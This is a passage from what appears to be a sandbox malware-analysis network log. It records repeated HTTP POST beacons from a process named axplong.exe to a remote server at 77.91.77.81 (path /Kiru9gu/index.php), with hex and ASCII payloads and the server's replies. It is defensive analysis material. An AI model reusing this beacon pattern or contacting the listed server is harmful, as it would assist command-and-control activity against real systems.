Jul 2, 2024 00:26:05.188023090 CEST	304	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Jul 2, 2024 00:26:05.885718107 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:26:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.4	49791	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:26:05.998982906 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 2, 2024 00:26:06.695009947 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:26:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.4	49792	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:26:06.703619957 CEST	304	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Jul 2, 2024 00:26:07.433557034 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:26:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.4	49793	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:26:07.547960997 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 2, 2024 00:26:08.309590101 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:26:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.4	49794	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:26:08.319535971 CEST	304	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Jul 2, 2024 00:26:09.030463934 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:26:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.4	49795	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:26:09.155659914 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 2, 2024 00:26:09.851804972 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:26:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.4	49796	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:26:09.861485004 CEST	304	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Jul 2, 2024 00:26:10.644871950 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:26:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.4	49797	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:26:10.768449068 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 2, 2024 00:26:11.677237988 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:26:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 2, 2024 00:26:11.678893089 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:26:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 2, 2024 00:26:11.692898035 CEST	304	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Jul 2, 2024 00:26:11.917973995 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:26:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.4	49798	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:26:12.058332920 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 2, 2024 00:26:12.770845890 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:26:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.4	49799	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:26:12.780452967 CEST	304	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Jul 2, 2024 00:26:13.509793997 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:26:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.4	49800	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:26:13.626180887 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 2, 2024 00:26:14.389738083 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:26:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.4	49802	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:26:14.531630039 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 2, 2024 00:26:15.261244059 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:26:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.4	49803	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:26:16.134707928 CEST	304	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Jul 2, 2024 00:26:16.854368925 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:26:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.4	49804	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:26:16.970205069 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 2, 2024 00:26:17.686127901 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:26:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.4	49805	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:26:17.696899891 CEST	304	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Jul 2, 2024 00:26:18.398189068 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:26:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.4	49806	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:26:18.517333984 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 2, 2024 00:26:19.234682083 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:26:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.4	49807	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:26:19.689344883 CEST	304	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Jul 2, 2024 00:26:20.456578970 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:26:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.4	49808	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:26:20.579199076 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 2, 2024 00:26:21.299407959 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:26:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.4	49809	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:26:21.311049938 CEST	304	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Jul 2, 2024 00:26:22.018337965 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:26:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.4	49810	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:26:22.150718927 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 2, 2024 00:26:22.836713076 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:26:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.2.4	49811	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:26:22.866240025 CEST	304	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Jul 2, 2024 00:26:23.563111067 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:26:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.4	49812	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:26:23.739320040 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 2, 2024 00:26:24.449767113 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:26:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.4	49813	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
